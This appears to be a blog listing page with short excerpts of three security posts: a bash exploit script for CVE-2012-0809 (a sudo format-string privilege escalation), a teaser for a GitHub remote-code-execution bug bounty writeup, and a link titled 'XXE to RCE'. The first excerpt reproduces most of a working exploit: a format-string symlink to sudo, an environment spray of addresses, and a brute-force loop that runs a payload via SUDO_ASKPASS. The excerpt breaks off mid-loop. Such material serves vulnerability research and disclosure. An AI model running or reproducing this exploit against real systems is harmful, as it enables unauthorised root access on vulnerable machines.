CVE-2012-0809 Exploit

Original gist #!/bin/bash # CVE-2012-0809 exploit # joernchen of Phenoelit's version # Payload to be executed goes to /tmp/a (might be a shell script) cd /tmp /bin/echo '-> Clearing ENV' for i in env |cut -f1 -d "=" ;do unset $i;done /bin/echo '-> Creating symlink' /bin/ln -s /usr/bin/sudo ./%134520134x%900$n /bin/echo '-> Setting ENV' export AAA=AAAA; export A; for i in /usr/bin/seq 1 5000; do export A=$Aecho -n -e '\x24\x83\x05\x08'; done; /bin/echo '-> Now a little Brute-Force' while true ; do SUDO_ASKPASS=/tmp/a .
Read more →

GitHub RCE Writeup

Original gist GitHub RCE by Environment variable injection Bug Bounty writeup Disclaimer: I’ll keep this really short but I hope you’ll get the key points. GitHub blogged a while ago about some internal tool called gerve: https://github.com/blog/530-how-we-made-github-fast Upon git+sshing to github.com gerve basically looks up your permission on the repo you want to interact with. Then it bounces you further in another forced SSH session to the back end where the repo actually is.
Read more →

XXE to RCE

Read more →